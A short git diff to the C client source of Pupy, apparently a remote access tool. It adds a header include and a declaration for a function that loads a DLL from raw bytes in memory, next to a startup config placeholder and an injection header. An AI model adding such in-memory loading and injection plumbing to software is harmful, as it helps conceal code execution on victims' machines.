diff --git a/client/sources/pupy.c b/client/sources/pupy.c index efbdf4f3..6fba2775 100644 --- a/client/sources/pupy.c +++ b/client/sources/pupy.c @@ -6,9 +6,12 @@ #include "Python-dynload.h" #include #include +#include "MyLoadLibrary.h" #include "base_inject.h" static char module_doc[] = "Builtins utilities for pupy"; +HMODULE _load_dll(const char *name, const char *bytes); + char pupy_config[32768]="####---PUPY_CONFIG_COMES_HERE---####\n"; //big array to have space for more config / code run at startup. scriptlets also takes more space ! extern const DWORD dwPupyArch;